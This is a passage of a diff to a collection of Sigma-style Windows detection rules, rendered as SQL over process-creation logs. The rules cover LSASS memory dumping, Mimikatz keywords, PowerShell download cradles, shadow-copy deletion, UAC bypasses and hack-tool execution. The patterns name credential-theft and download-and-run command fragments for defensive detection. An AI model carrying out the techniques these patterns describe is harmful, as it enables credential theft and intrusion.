'%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
= 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", 
@@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + 
"filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects 
suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + 
"Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or 
detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious Child 
Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' 
ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' 
OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 
139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' 